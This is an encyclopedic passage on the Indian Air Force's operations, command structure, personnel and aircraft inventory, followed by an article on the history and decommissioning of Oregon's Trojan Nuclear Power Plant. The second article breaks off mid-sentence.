Following the inability to negotiate an end to the Sri Lankan Civil War, and to provide humanitarian aid through an unarmed convoy of ships, the Indian Government decided to carry out an airdrop of the humanitarian supplies on the evening of 4 June 1987 designated Operation Poomalai (Tamil: Garland) or Eagle Mission 4. Five An-32s escorted by four Mirage 2000 of 7 Sqn AF, 'The Battleaxes', carried out the supply drop which faced no opposition from the Sri Lankan Armed Forces. Another Mirage 2000 orbited 150 km away, acting as an airborne relay of messages to the entire fleet since they would be outside radio range once they descended to low levels. The Mirage 2000 escort formation was led by Wg Cdr Ajit Bhavnani, with Sqn Ldrs Bakshi, NA Moitra and JS Panesar as his team members and Sqn Ldr KG Bewoor as the relay pilot. Sri Lanka accused India of "blatant violation of sovereignty". India insisted that it was acting only on humanitarian grounds. In 1987, the IAF supported the Indian Peace Keeping Force (IPKF) in northern and eastern Sri Lanka in Operation Pawan. About 70,000 sorties were flown by the IAF's transport and helicopter force in support of nearly 100,000 troops and paramilitary forces without a single aircraft lost or mission aborted. IAF An-32s maintained a continuous air link between air bases in South India and Northern Sri Lanka transporting men, equipment, rations and evacuating casualties. Mi-8s supported the ground forces and also provided air transportation to the Sri Lankan civil administration during the elections. Mi-25s of No. 125 Helicopter Unit were utilised to provide suppressive fire against militant strong points and to interdict coastal and clandestine riverine traffic. On the night of 3 November 1988, the Indian Air Force mounted special operations to airlift a parachute battalion group from Agra, non-stop over to the remote Indian Ocean archipelago of the Maldives in response to Maldivian president Gayoom's request for military help against a mercenary invasion in Operation Cactus. The IL-76s of No. 44 Squadron landed at Hulhule at 0030 hours and the Indian paratroopers secured the airfield and restored Government rule at Male within hours. Four Mirage 2000 aircraft of 7 Sqn, led by Wg Cdr AV 'Doc' Vaidya, carried out a show of force early that morning, making low-level passes over the islands. Kargil War (1999) On 11 May 1999, the Indian Air Force was called in to provide close air support to the Indian Army at the height of the ongoing Kargil conflict with the use of helicopters. The IAF strike was code named Operation Safed Sagar. The first strikes were launched on 26 May, when the Indian Air Force struck infiltrator positions with fighter aircraft and helicopter gunships. The initial strikes saw MiG-27s carrying out offensive sorties, with MiG-21s and later MiG-29s providing fighter cover. The IAF also deployed its radars and the MiG-29 fighters in vast numbers to keep check on Pakistani military movements across the border. Srinagar Airport was at this time closed to civilian air-traffic and dedicated to the Indian Air Force. On 27 May, the Indian Air Force suffered its first fatality when it lost a MiG-21 and a MiG-27 in quick succession. The following day, while on an offensive sortie, a Mi-17 was shot down by three Stinger missiles and lost its entire crew of four. Following these losses the IAF immediately withdrew helicopters from offensive roles as a measure against the threat of Man-portable air-defence systems (MANPAD). 
On 30 May, the Mirage 2000s were introduced in an offensive role, as they were deemed better in performance under the high-altitude conditions of the conflict zone. The Mirage 2000s were not only better equipped to counter the MANPAD threat compared to the MiGs, but also gave the IAF the ability to carry out aerial raids at night. The MiG-29s were used extensively to provide fighter escort to the Mirage 2000s. Radar transmissions of Pakistani F-16s were picked up repeatedly, but these aircraft stayed away. The Mirages successfully targeted enemy camps and logistic bases in Kargil and severely disrupted their supply lines. Mirage 2000s were used for strikes on Muntho Dhalo and the heavily defended Tiger Hill and paved the way for their early recapture. At the height of the conflict, the IAF was conducting over forty sorties daily over the Kargil region. By 26 July, the Indian forces had successfully repulsed the Pakistani forces from Kargil. Post Kargil incidents (1999–present) Since the late 1990s, the Indian Air Force has been modernising its fleet to counter challenges in the new century. The fleet size of the IAF has decreased to 33 squadrons during this period because of the retirement of older aircraft. Still, India maintains the fourth largest air force in the world. The IAF plans to raise its strength to 42 squadrons. Self-reliance is the main aim being pursued by the defence research and manufacturing agencies. On 10 August 1999, IAF MiG-21s intercepted a Pakistan Navy Breguet Atlantique which was flying over Sir Creek, a disputed territory. The aircraft was shot down, killing all 16 Pakistani Navy personnel on board. India claimed that the Atlantique was on a mission to gather information on IAF air defence, a charge emphatically rejected by Pakistan, which argued that the unarmed aircraft was on a training mission. On 2 August 2002, the Indian Air Force bombed Pakistani posts along the Line of Control in the Kel sector, following inputs about a Pakistani military buildup near the sector. On 20 August 2013, the Indian Air Force created a world record by performing the highest landing of a C-130J, at the high-altitude Daulat Beg Oldi airstrip in Ladakh. The medium-lift aircraft will be used to deliver troops and supplies and to improve communication networks. The aircraft belonged to the Veiled Vipers squadron based at Hindon Air Force Station. On 13 July 2014, two MiG-21s were sent from Jodhpur Air Base to investigate a Turkish Airlines aircraft over Jaisalmer when it repeated an identification code provided by another commercial passenger plane that had already entered Indian airspace before it. The flights were on their way to Mumbai and Delhi, and the planes were later allowed to proceed after their credentials were verified. 2019 Balakot airstrike Following heightened tensions between India and Pakistan after the 2019 Pulwama attack, carried out by Jaish-e-Mohammed (JeM), which killed forty servicemen of the Central Reserve Police Force, a group of twelve Mirage 2000 fighter planes from the Indian Air Force carried out air strikes on alleged JeM bases in Chakothi and Muzaffarabad in Pakistan-administered Kashmir. Furthermore, the Mirage 2000s targeted an alleged JeM training camp in Balakot, a town in the Pakistani province of Khyber Pakhtunkhwa. 
Pakistan claimed that the Indian aircraft had only dropped bombs in a forested area near the village of Jaba, some distance from Balakot, demolishing pine trees, while Indian officials claimed to have bombed the camp and killed a large number of terrorists in the airstrike. 2019 India–Pakistan standoff On 27 February 2019, in retaliation for the IAF bombing of an alleged terrorist hideout in Balakot, a group of PAF Mirage-5 and JF-17 fighters allegedly conducted an airstrike against certain ground targets across the Line of Control. They were intercepted by a group of IAF fighters consisting of Su-30MKI and MiG-21 jets, and a dogfight ensued. According to India, one PAF F-16 was shot down by an IAF MiG-21 piloted by Abhinandan Varthaman, while Pakistan denied the use of F-16s in the operation. According to Pakistan, a MiG-21 and a Su-30MKI were shot down, while India claims that only the MiG-21 was shot down. Indian officials rejected the Pakistani claim of shooting down a Su-30MKI, stating that it would be impossible to hide an aircraft crash in a populated area like Kashmir, and called the claim a cover-up for the loss of the F-16. While the downed MiG-21's pilot had ejected successfully, he landed in Pakistan-administered Kashmir and was captured by the Pakistan military. Before his capture he was assaulted by a few locals. After a couple of days of captivity, the captured pilot was released by Pakistan in accordance with its obligations under the Third Geneva Convention. While Pakistan denied the involvement of any of its F-16 aircraft in the strike, the IAF presented remnants of AMRAAM missiles, which are only carried by the F-16s within the PAF, as proof of their involvement. The US-based Foreign Policy magazine, quoting unnamed US officials, reported in April 2019 that an audit did not find any Pakistani F-16s missing. However, this has not been confirmed officially by the US, which treated the audit as a bilateral matter between the US and Pakistan. Structure The President of India is the Supreme Commander of all Indian armed forces and by virtue of that fact is the national Commander-in-Chief of the Air Force. The Chief of the Air Staff, holding the rank of Air Chief Marshal, is the commander of the Air Force. In January 2002, the government conferred the rank of Marshal of the Indian Air Force on Arjan Singh, making him the first and only five-star officer of the Indian Air Force and ceremonial chief of the air force. Commands The Indian Air Force is divided into five operational and two functional commands. Each command is headed by an Air Officer Commanding-in-Chief with the rank of Air Marshal. The purpose of an operational command is to conduct military operations using aircraft within its area of responsibility, whereas the responsibility of functional commands is to maintain combat readiness. Aside from the Training Command at Bangalore, the primary flight training is done at the Air Force Academy (located in Hyderabad), followed by operational training at various other schools. Advanced officer training for command positions is also conducted at the Defence Services Staff College; specialised advanced flight training schools are located at Bidar, Karnataka and Hakimpet, Telangana (also the location for helicopter training). Technical schools are found at a number of other locations. The commands, their headquarters and their current commanders are listed below. 
Central Air Command (CAC) – Prayagraj, Uttar Pradesh – Air Marshal Richard John Duckworth, AVSM, VSM
Eastern Air Command (EAC) – Shillong, Meghalaya – Air Marshal Dilip Kumar Patnaik, AVSM, VM
Southern Air Command (SAC) – Thiruvananthapuram, Kerala – Air Marshal Jonnalagedda Chalapati, AVSM, VSM
South Western Air Command (SWAC) – Gandhinagar, Gujarat – Air Marshal Vikram Singh, AVSM, VSM
Western Air Command (WAC) – New Delhi – Air Marshal Amit Dev, PVSM, AVSM, VM (Outlook India, 1 October 2021)
Training Command (TC)+ – Bangalore, Karnataka – Air Marshal Manavendra Singh, PVSM, AVSM, VrC, VSM, ADC
Maintenance Command (MC)+ – Nagpur, Maharashtra – Air Marshal Shashiker Choudhary, PVSM, AVSM, VSM, ADC
Note: + = Functional Command
Wings A wing is a formation intermediate between a command and a squadron. It generally consists of two or three IAF squadrons and helicopter units, along with forward base support units (FBSUs). FBSUs do not have or host any squadrons or helicopter units but act as transit airbases for routine operations. In times of war, they can become fully fledged air bases playing host to various squadrons. In all, about 47 wings and 19 FBSUs make up the IAF. Wings are typically commanded by an air commodore. Stations Within each operational command are anywhere from nine to sixteen bases or stations. Smaller than wings, but similarly organised, stations are static units commanded by a group captain. A station typically has one wing and one or two squadrons assigned to it. Squadrons and units Squadrons are the field units and formations attached to static locations. Thus, a flying squadron or unit is a sub-unit of an air force station which carries out the primary task of the IAF. A fighter squadron consists of 18 aircraft; all fighter squadrons are headed by a commanding officer with the rank of wing commander. Some transport squadrons and helicopter units are headed by a commanding officer with the rank of group captain. Flights Flights are sub-divisions of squadrons, commanded by a squadron leader. Each flight consists of two sections. Sections The smallest unit is the section, led by a flight lieutenant. Each section consists of three aircraft. Within this formation structure, the IAF has several service branches for day-to-day operations. They are: Garud Commando Force The Garud commandos are the special forces of the Indian Air Force (IAF). Their tasks include counter-terrorism, hostage rescue, providing security to the IAF's vulnerably located assets and various air force-specific special operations. First conceived in 2002, this unit was officially established on 6 February 2004. All Garuds are volunteers who undergo 52 weeks of basic training, which includes a three-month probation followed by special operations training, basic airborne training and other warfare and survival skills. The last phase of basic training sees Garuds being deployed to gain combat experience. Advanced training follows, which includes specialised weapons training. The mandated tasks of the Garuds include direct action, special reconnaissance, rescuing downed pilots in hostile territory, establishing airbases in hostile territory and providing air-traffic control to these airbases. 
The Garuds also undertake the suppression of enemy air defences, the destruction of other enemy assets such as radars, and the evaluation of the outcomes of Indian airstrikes, and they use laser designators to guide Indian airstrikes. The security of IAF installations and assets is usually handled by the Air Force Police and the Defence Security Corps, even though some critical assets are protected by the Garuds. Integrated Space Cell An Integrated Space Cell, which will be jointly operated by all three services of the Indian armed forces, the civilian Department of Space and the Indian Space Research Organisation (ISRO), has been set up to utilise more effectively the country's space-based assets for military purposes. This command will leverage space technology, including satellites. Unlike an aerospace command, where the air force controls most of its activities, the Integrated Space Cell envisages co-operation and co-ordination between the three services as well as civilian agencies dealing with space. India currently has 10 remote sensing satellites in orbit. Though most are not meant to be dedicated military satellites, some have a spatial resolution high enough for them to be used for military applications as well. Noteworthy satellites include the Technology Experiment Satellite (TES), which has a high-resolution panchromatic camera (PAN); the RISAT-2, which is capable of imaging in all-weather conditions; and the CARTOSAT-2, CARTOSAT-2A and CARTOSAT-2B, which carry high-resolution panchromatic cameras (black and white only). Display teams The Surya Kiran Aerobatic Team (SKAT) (Surya Kiran is Sanskrit for Sun Rays) is an aerobatics demonstration team of the Indian Air Force. It was formed in 1996 and is the successor to the Thunderbolts. The team has a total of 13 pilots (selected from the fighter stream of the IAF) and operates 9 HAL HJT-16 Kiran Mk.2 trainer aircraft painted in a "day-glo orange" and white colour scheme. The Surya Kiran team was conferred squadron status in 2006, and presently has the designation of 52 Squadron ("The Sharks"). The team is based at the Indian Air Force Station at Bidar. The IAF has begun the process of converting the Surya Kirans to BAE Hawks. Sarang (Sanskrit for Peacock) is the Helicopter Display Team of the Indian Air Force. The team was formed in October 2003, and its first public performance was at the Asian Aerospace Show, Singapore, in 2004. The team flies four HAL Dhruvs painted in red and white with a peacock figure on each side of the fuselage. The team is based at the Sulur Air Force Station, Coimbatore. Personnel Over the years, reliable sources have provided notably divergent estimates of the personnel strength of the Indian Air Force after analysing open-source intelligence. The public policy organisation GlobalSecurity.org estimated that the IAF had a strength of 110,000 active personnel in 1994. In 2006, Anthony Cordesman estimated that strength to be 170,000 in the International Institute for Strategic Studies (IISS) publication "The Asian Conventional Military Balance in 2006". In 2010, James Hackett revised that estimate to an approximate strength of 127,000 active personnel in the IISS publication "Military Balance 2010". The Indian Air Force has a sanctioned strength of 12,550 officers (12,404 serving, with 146 under strength) and 142,529 airmen (127,172 serving, with 15,357 under strength). Rank structure The rank structure of the Indian Air Force is based on that of the Royal Air Force. 
The highest rank attainable in the IAF is Marshal of the Indian Air Force, conferred by the President of India after exceptional service during wartime. MIAF Arjan Singh is the only officer to have achieved this rank. The head of the Indian Air Force is the Chief of the Air Staff, who holds the rank of Air Chief Marshal. Officers Anyone holding Indian citizenship can apply to be an officer in the Air Force as long as they satisfy the eligibility criteria. There are four entry points to become an officer. Male applicants, who are between the ages of 16 and 19 and have passed high school graduation, can apply at the Intermediate level. Men and women applicants, who have graduated from college (three-year course) and are between the ages of 18 and 28, can apply at the Graduate level entry. Graduates of engineering colleges can apply at the Engineer level if they are between the ages of 18 and 28 years. The age limit for the flying and ground duty branch is 23 years of age and for technical branch is 28 years of age. After completing a master's degree, men and women between the ages of 18 and 28 years can apply at the Post Graduate level. Post graduate applicants do not qualify for the flying branch. For the technical branch the age limit is 28 years and for the ground duty branch it is 25. At the time of application, all applicants below 25 years of age must be single. The IAF selects candidates for officer training from these applicants. After completion of training, a candidate is commissioned as a Flying Officer. Airmen The duty of an airman is to make sure that all the air and ground operations run smoothly. From operating Air Defence systems to fitting missiles, they are involved in all activities of an air base and give support to various technical and non-technical jobs. The airmen of Technical trades are responsible for maintenance, repair and prepare for use the propulsion system of aircraft and other airborne weapon delivery system, Radar, Voice/Data transmission and reception equipment, latest airborne weapon delivery systems, all types of light, mechanical, hydraulic, pneumatic systems of airborne missiles, aero engines, aircraft fuelling equipment and heavy duty mechanical vehicles, cranes and loading equipment etc. The competent and qualified Airmen from Technical trades also participate in flying as Flight Engineers, Flight Signallers and Flight Gunners. The recruitment of personnel below officer rank is conducted through All India Selection Tests and Recruitment Rallies. All India Selection Tests are conducted among 15 Airmen Selection Centres (ASCs) located all over India. These centres are under the direct functional control of Central Airmen Selection Board (CASB), with administrative control and support by respective commands. The role of CASB is to carry out selection and enrolment of airmen from the Airmen Selection Centres for their respective commands. Candidates initially take a written test at the time of application. Those passing the written test undergo a physical fitness test, an interview conducted in English, and medical examination. Candidates for training are selected from individuals passing the battery of tests, on the basis of their performance. Upon completion of training, an individual becomes an Airman. Some MWOs and WOs are granted honorary commission in the last year of their service as an honorary Flying Officer or Flight Lieutenant before retiring from the service. 
Honorary officers Sachin Tendulkar was the first sportsperson and the first civilian without an aviation background to be awarded the honorary rank of group captain by the Indian Air Force. Non combatants enrolled and civilians Non combatants enrolled (NCs(E)) were established in British India as personal assistants to the officer class, and are equivalent to the orderly or sahayak of the Indian Army. Almost all the commands have some percentage of civilian strength which are central government employees. These are regular ranks which are prevalent in ministries. They are usually not posted outside their stations and are employed in administrative and non-technical work. Training and education The Indian Armed Forces have set up numerous military academies across India for training its personnel, such as the National Defence Academy (NDA). Besides the tri-service institutions, the Indian Air Force has a Training Command and several training establishments. While technical and other support staff are trained at various Ground Training Schools, the pilots are trained at the Air Force Academy, Dundigul (located in Hyderabad). The Pilot Training Establishment at Allahabad, the Air Force Administrative College at Coimbatore, the Institute of Aerospace Medicine at Bangalore, the Air Force Technical College, Bangalore at Jalahalli, the Tactics and Air Combat and Defence Establishment at Gwalior, and the Paratrooper's Training School at Agra are some of the other training establishments of the IAF. Aircraft inventory The Indian Air Force has aircraft and equipment of Russian (erstwhile Soviet Union), British, French, Israeli, US and Indian origins with Russian aircraft dominating its inventory. HAL produces some of the Russian and British aircraft in India under licence. The exact number of aircraft in service with the Indian Air Force cannot be determined with precision from open sources. Various reliable sources provide notably divergent estimates for a variety of high-visibility aircraft. Flight International estimates there to be around 1,750 aircraft in service with the IAF, while the International Institute for Strategic Studies provides a similar estimate of 1,850 aircraft. Both sources agree there are approximately 900 combat capable (fighter, attack etc.) aircraft in the IAF. Multi-role fighters and strike aircraft Dassault Rafale: the latest addition to India's aircraft arsenal; India has signed a deal for 36 Dassault Rafale multirole fighter aircraft. As of Feb 2022, 35 Rafale fighters are in service with the Indian Air Force. Sukhoi Su-30MKI: the IAF's primary air superiority fighter, with additional air-to-ground (strike) mission capability, is the Sukhoi Su-30MKI. 272 Su-30MKIs have been in service with 12 more on order with HAL. Mikoyan MiG-29: the MiG-29, known as Baaz (Hindi for Hawk), is a dedicated air superiority fighter, constituting the IAF's second line of defence after the Su-30MKI. There are 69 MiG-29s in service, all of which have been recently upgraded to the MiG-29UPG standard, after the decision was made in 2016 to upgrade the remaining 21 MiG-29s to the UPG standard. Dassault Mirage 2000: the Mirage 2000, known as Vajra (Sanskrit for diamond or thunderbolt) in Indian service. The IAF currently operates 49 Mirage 2000Hs and 8 Mirage 2000 TH all of which are currently being upgraded to the Mirage 2000-5 MK2 standard with Indian specific modifications and 2 Mirage 2000-5 MK2 are in service . The IAF's Mirage 2000 are scheduled to be phased out by 2030. 
HAL Tejas: IAF MiG-21s are to be replaced by the domestically built HAL Tejas. The first Tejas IAF unit, No. 45 Squadron IAF Flying Daggers, was formed on 1 July 2016, followed by No. 18 Squadron IAF "Flying Bullets" on 27 May 2020. Initially stationed at Bangalore, the first squadron was then to be transferred to its home base in Sulur, Tamil Nadu. In February 2021, the Indian Air Force ordered a further 83 Tejas, comprising 73 single-seat Mark 1As and 10 two-seat Mark 1 trainers; together with the 40 Mark 1s ordered earlier, this brings the total ordered to 123 aircraft. SEPECAT Jaguar: the Jaguar, known as the Shamsher, serves as the IAF's primary ground attack force. The IAF currently operates 139 Jaguars. The first batch of DARIN-1 Jaguars is now going through a DARIN-3 upgrade, being equipped with EL/M-2052 AESA radars, an improved jamming suite and new avionics. These aircraft are scheduled to be phased out by 2030. Mikoyan-Gurevich MiG-21: the MiG-21 serves as an interceptor aircraft in the IAF, which has phased out most of its MiG-21s and planned to keep only the 125 aircraft upgraded to the MiG-21 Bison standard. The phase-out date for these interceptors has been postponed several times. Initially set for 2014–2017, it was later postponed to 2019. The current phase-out is scheduled for 2021–2022. Airborne early warning and control system The IAF is currently training crews in the operation of the indigenously developed DRDO AEW&CS, conducting the training on Embraer ERJ 145 aircraft. The IAF also operates the EL/W-2090 Phalcon AEW&C incorporated in a Beriev A-50 platform. A total of three such systems are currently in service, with two further potential orders. The two additional Phalcons are currently in negotiation to settle price differences between Russia and India. India is also going ahead with Project India, an in-house AWACS program to develop and deliver six Phalcon-class AWACS, based on DRDO work on the smaller AEW&CS. Aerial refuelling The IAF currently operates six Ilyushin Il-78MKIs in the aerial refuelling (tanker) role. Transport aircraft For strategic airlift operations, the IAF uses the Ilyushin Il-76, known as Gajraj (Hindi for King Elephant) in Indian service. The IAF operated 17 Il-76s in 2010, which are in the process of being replaced by C-17 Globemaster IIIs. IAF C-130Js are used by special forces for combined Army-Air Force operations. India purchased six C-130Js; however, one crashed at Gwalior on 28 March 2014 while on a training mission, killing all 5 on board and destroying the aircraft. The Antonov An-32, known in Indian service as the Sutlej (named after the Sutlej River), serves as a medium transport aircraft in the IAF. The aircraft is also used in bombing roles and paradropping operations. The IAF currently operates 105 An-32s, all of which are being upgraded. The IAF operates 53 Dornier 228s to fulfil its light transport duties. The IAF also operates Boeing 737s and Embraer ECJ-135 Legacy aircraft as VIP transports and passenger airliners for troops. Other VIP transport aircraft are used for both the Indian President and the Prime Minister under the call sign Air India One. The Hawker Siddeley HS 748 once formed the backbone of the IAF's transport fleet, but is now used mainly for training and communication duties. A replacement is under consideration. Trainer aircraft The HAL HPT-32 Deepak is the IAF's basic flight training aircraft for cadets. 
The HPT-32 was grounded in July 2009 following a crash that killed two senior flight instructors, but was revived in May 2010 and is to be fitted with a parachute recovery system (PRS) to enhance survivability during an emergency in the air and to bring the trainer down safely. The HPT-32 is to be phased out soon and has been replaced in the basic training role by the Swiss-built Pilatus PC-7 Mk II. The IAF uses the HAL HJT-16 Kiran Mk.I for intermediate flight training of cadets, while the HJT-16 Kiran Mk.II provides advanced flight and weapons training. The HAL HJT-16 Kiran Mk.2 is also operated by the Surya Kiran Aerobatic Team (SKAT) of the IAF. The Kiran is to be replaced by the HAL HJT-36 Sitara. The BAE Hawk Mk 132 serves as an advanced jet trainer in the IAF and is progressively replacing the Kiran Mk.II. The IAF has begun the process of converting the Surya Kiran display team to Hawks. A total of 106 BAE Hawk trainers have been ordered by the IAF, of which 39 have entered service. The IAF has also ordered 72 Pipistrel Virus SW 80 microlight aircraft for basic training purposes. Helicopters The HAL Dhruv serves primarily as a light utility helicopter in the IAF. In addition to transport and utility roles, newer Dhruvs are also used as attack helicopters. Four Dhruvs are also operated by the Indian Air Force Sarang Helicopter Display Team. The HAL Chetak is a light utility helicopter used primarily for training, rescue and light transport roles in the IAF; it is being gradually replaced by the HAL Dhruv. The HAL Cheetah is a light utility helicopter used for high-altitude operations. It is used for both transport and search-and-rescue missions in the IAF. The Mil Mi-8 and the Mil Mi-17, Mi-17-1V and Mi-17V-5 are operated by the IAF for medium-lift strategic and utility roles. The Mi-8 is being progressively replaced by the Mi-17 series of helicopters. The IAF has ordered 22 Boeing AH-64E Apache attack helicopters, 68 HAL Light Combat Helicopters (LCH), 35 HAL Rudra attack helicopters, 15 CH-47F Chinook heavy lift helicopters and 150 Mi-17V-5s to replace and augment its existing fleet of Mi-8s, Mi-17s, and Mi-24s. The Mil Mi-26 serves as a heavy lift helicopter in the IAF. It can also be used to transport troops or as a flying ambulance. The IAF currently operates three Mi-26s. The Mil Mi-35 serves primarily as an attack helicopter in the IAF and can also act as a low-capacity troop transport. The IAF currently operates two squadrons (No. 104 Firebirds and No. 125 Gladiators) of Mi-25/35s. Unmanned Aerial Vehicles The IAF currently uses the IAI Searcher II and IAI Heron for reconnaissance and surveillance purposes. The IAI Harpy serves as an Unmanned Combat Aerial Vehicle (UCAV) designed to attack radar systems. The IAF also operates the DRDO Lakshya, which serves as a realistic towed aerial sub-target for live-fire training. Land-based missile systems Surface-to-air missiles The air force operates twenty-five squadrons of S-125 Pechora, six squadrons of 9K33 Osa-AK, ten flights of 9K38 Igla-1 and thirteen squadrons of Akash, along with eighteen squadrons of SPYDER, for air defence. Two additional squadrons of Akash were on order. The IAF and the Indian Army have both placed orders, totalling about 1,000 kits, for the MRSAM system. Ballistic missiles The IAF currently operates the Prithvi-II short-range ballistic missile (SRBM). The Prithvi-II is an IAF-specific variant of the Prithvi ballistic missile. 
Future The number of aircraft in the IAF has been decreasing from the late 1990s due to the retirement of older aircraft and several crashes. To deal with the depletion of force levels, the IAF has started to modernise its fleet. This includes both the upgrade of existing aircraft, equipment and infrastructure as well as induction of new aircraft and equipment, both indigenous and imported. As new aircraft enter service and numbers recover, the IAF plans to have a fleet of 42 squadrons. Expected future acquisitions Single-engined fighter On 3 January 2017, Minister of Defence Manohar Parrikar addressed a media conference and announced plans for a competition to select a Strategic Partner to deliver "... 200 new single engine fighters to be made in India, which will easily cost around (USD)$45 million apiece without weaponry" with an expectation that Lockheed Martin (USA) and Saab (Sweden) will pitch the F-16 Block 70 and Gripen, respectively. An MoD official said that a global tender will be put to market in the first quarter of 2018, with a private company nominated as the strategic partners production agency followed by a two or more year process to evaluate technical and financial bids and conduct trials, before the final government-to-government deal in 2021. This represents 11 squadrons of aircraft plus several 'attrition' aircraft. India is also planning to set up an assembly line of American Lockheed Martin F-16 Fighting Falcon Block 70 in Bengaluru. It is not yet confirmed whether IAF will induct these aircraft or not. In 2018, the defence minister Nirmala Sitharaman gave the go ahead to scale up the manufacturing of Tejas at HAL and also to export Tejas. She is quoted saying "We are not ditching the LCA. We have not gone for anything instead of Tejas. We are very confident that Tejas Mark II will be a big leap forward to fulfil the single engine fighter requirement of the forces.". IAF committed to buy 201 Mark-II variant of the Tejas taking the total order of Tejas to 324. The government also scrapped the plan to import single engine fighters leading to reduction in reliance on imports thereby strengthening the domestic defence industry. The IAF also submitted a request for information to international suppliers for a stealth unmanned combat air vehicle (UCAV) Current acquisitions The IAF has placed orders for 123 HAL Tejas 40 Mark 1, 73 Mark 1A fighters and 10 Mark 1 trainers, 36 Dassault Rafale multi-role fighters, 106 basic trainer aircraft HAL HTT-40, 112 Pilatus PC-7MkII basic trainers, 72 HAL HJT-36 Sitara trainers, 65 HAL Light Combat Helicopters, 6 Airbus A330 MRTT, 56 EADS CASA C-295 aircraft and IAI Harop UCAVs. DRDO and HAL projects Indian defence company HAL and Defense Research Organization DRDO are developing several aircraft for the IAF such as the HAL Tejas Mk2, HAL TEDBF (naval aircraft), HAL AMCA (5th generation aircraft), DRDO AEW&CS (revived from the Airavat Project), NAL Saras, HAL HJT-36 Sitara, HAL HTT-40, HAL Light Utility Helicopter (LUH), DRDO Rustom and DRDO Ghatak UCAV. DRDO has developed the Akash missile system for the IAF and also developed the Prithvi II ballistic missile. HAL is also close to develop its own fifth generation fighter aircraft HAL AMCA which will be inducted by 2028. DRDO has entered in a joint venture with Israel Aerospace Industries (IAI) to develop the Barak 8 SAM. Akash-NG is also being developed by DRDO which will be the same range of Barak 8. 
DRDO is developing the air-launched version of the BrahMos cruise missile in a joint venture with Russia's NPO Mashinostroyeniya. DRDO has now successfully developed the nuclear-capable Nirbhay cruise missile. DRDO and HAL are also engaged in developing unmanned combat systems; under this effort, HAL is to develop a whole family of unmanned aircraft by the end of 2024–25. Network-centric warfare The Air Force Network (AFNET), a robust digital information grid that enables quick and accurate threat responses, was launched in 2010, helping the IAF become a truly network-centric air force. AFNET is a secure communication network linking command and control centres with offensive aircraft, sensor platforms and ground missile batteries. The Integrated Air Command and Control System (IACCS), an automated system for air defence operations, will ride the AFNET backbone, integrating ground and airborne sensors, weapon systems and command and control nodes. Subsequent integration with civil radar and other networks is expected to provide an integrated air situation picture, and reportedly acts as a force multiplier for intelligence analysis, mission control, and support activities like maintenance and logistics. The design features multiple layers of security measures, including encryption and intrusion prevention technologies, to hinder and deter espionage efforts. See also List of Indian Air Force Gallantry Award Winners List of Indian Army Gallantry Award Winners List of historical aircraft of the Indian Air Force References Bibliography External links Official website of The Indian Air Force 1965, IAF Claimed its First Air-to-Air Kill documentary published by IAF Indian Air Force on bharat-rakshak.com Global Security article on Indo-Pakistani Wars Designators Batches of Indian Air Force Career Air Force
https://en.wikipedia.org/wiki/Trojan%20Nuclear%20Power%20Plant
Trojan Nuclear Power Plant
Trojan Nuclear Power Plant was a pressurized water reactor nuclear power plant (Westinghouse design) in the northwest United States, located southeast of Rainier, Oregon, and the only commercial nuclear power plant to be built in Oregon. There was much public opposition to the plant from the design stage. The three main opposition groups were the Trojan Decommissioning Alliance, Forelaws on the Board, and Mothers for Peace. There were largely non-violent protests from 1977, and subsequent arrests of participants. The plant was connected to the grid in December 1975. After 16 years of irregular service, the plant was closed permanently in 1992 by its operator, Portland General Electric (PGE), after cracks were discovered in the steam-generator tubing. Decommissioning and demolition of the plant began the following year and was largely completed in 2006. While operating, Trojan represented more than 12% of the electrical generation capacity of Oregon. The site lies north of St. Helens, on the west (south) bank of the Columbia River. History The Trojan Powder Company had formerly manufactured gunpowder and dynamite on a site on the banks of the Columbia River near the town of Rainier, Oregon. In 1967, Portland General Electric chose the site for a new nuclear power plant. Construction began on February 1, 1970; first criticality was achieved on December 15, 1975, and grid connection eight days later on December 23. Commercial operation began on May 20, 1976, under a 35-year license set to expire in 2011. At the time, the single 1,130 megawatt unit at Trojan was the world's largest pressurized water reactor; it cost $460 million to build. Environmental opposition dogged Trojan from its inception, and the opposition included non-violent protests organized by the Trojan Decommissioning Alliance. Direct action protests were held at the plant in 1977 and 1978, resulting in hundreds of arrests. In 1978, the plant went offline on March 17 for routine refueling and was idle for nine months while modifications were made to improve its earthquake resistance. This followed the discovery of both major building construction errors and the close proximity of a previously unknown fault. The operators sued the builders, and an undisclosed out-of-court settlement was eventually reached. The Trojan steam generators were designed to last the life of the plant, but it was only four years before premature cracking of the steam tubes was observed. In October 1979, the plant was shut down through the end of the year. The plant had an extended shutdown in 1984, with difficulty restarting. In the 1980 election, a ballot measure to ban construction of further nuclear power plants in the state without federally approved waste facilities was approved by the voters 608,412 (53.2%) to 535,049 (46.8%). In 1986, a ballot measure initiated by Lloyd Marbet for immediate closure of the Trojan plant failed, 35.7% yes to 64.3% no. This proposal was resubmitted in 1990, and again in 1992, when a similar proposal (by Jerry and Marilyn Wilson) to close the plant was also included. Each measure was soundly defeated, by margins of over 210,000 votes. Although all closure proposals were defeated, the plant operators committed to successively earlier closure dates for the plant. In 1992, PGE spent $4.5 million to successfully defeat ballot measures seeking to close Trojan immediately, rather than within four years as PGE had planned. At the time, it was the most expensive ballot measure campaign in Oregon history. 
A week after the election, the Trojan plant suffered another steam generator tube leak of radioactive water and was shut down. It was announced that replacement of the steam generators would be necessary. In December 1992, documents were leaked from the U.S. Nuclear Regulatory Commission showing that staff scientists believed that Trojan might be unsafe. In early January 1993, PGE chief executive Ken Harrison announced the company would not try to restart the plant. After 1993 decision not to restart The spent fuel was transferred from cooling pools to 34 concrete and steel storage casks in 2003. In 2005, the reactor vessel and other radioactive equipment were removed from the Trojan plant, encased in concrete foam, shrink-wrapped, and transported intact by barge along the Columbia River to the Hanford Nuclear Reservation in Washington, where the vessel was buried in a pit and covered with gravel, which made it the first commercial reactor to be moved and buried whole. The spent fuel was awaiting transport to the Yucca Mountain Repository until that project was canceled in 2009. The iconic cooling tower, visible from Interstate 5 in Washington and U.S. Route 30 in Oregon, was demolished via dynamite implosion at 7:00 a.m. PDT on a Sunday morning in 2006. This event marked the first implosion of a cooling tower at a nuclear plant in the United States. Additional demolition work on the remaining structures continued through 2008. The central office building and the reactor building were demolished by Northwest Demolition and Dismantling in 2008. Remaining are five buildings: two warehouses, a small building on the river side, a guard shack, and offices outside the secured facility. It is expected that demolition of the plant will cost approximately $230 million, which includes the termination of the plant's possession-only license, conventional demolition of the buildings and the continuing cost of storage of used nuclear fuel. A number of the air raid sirens that were originally installed in the area around Trojan, to warn of an incident at the plant that could endanger the general public, continue to stand in the Washington cities of Longview, Kelso, and Kalama. Some of the other sirens, which have been removed, have been repurposed 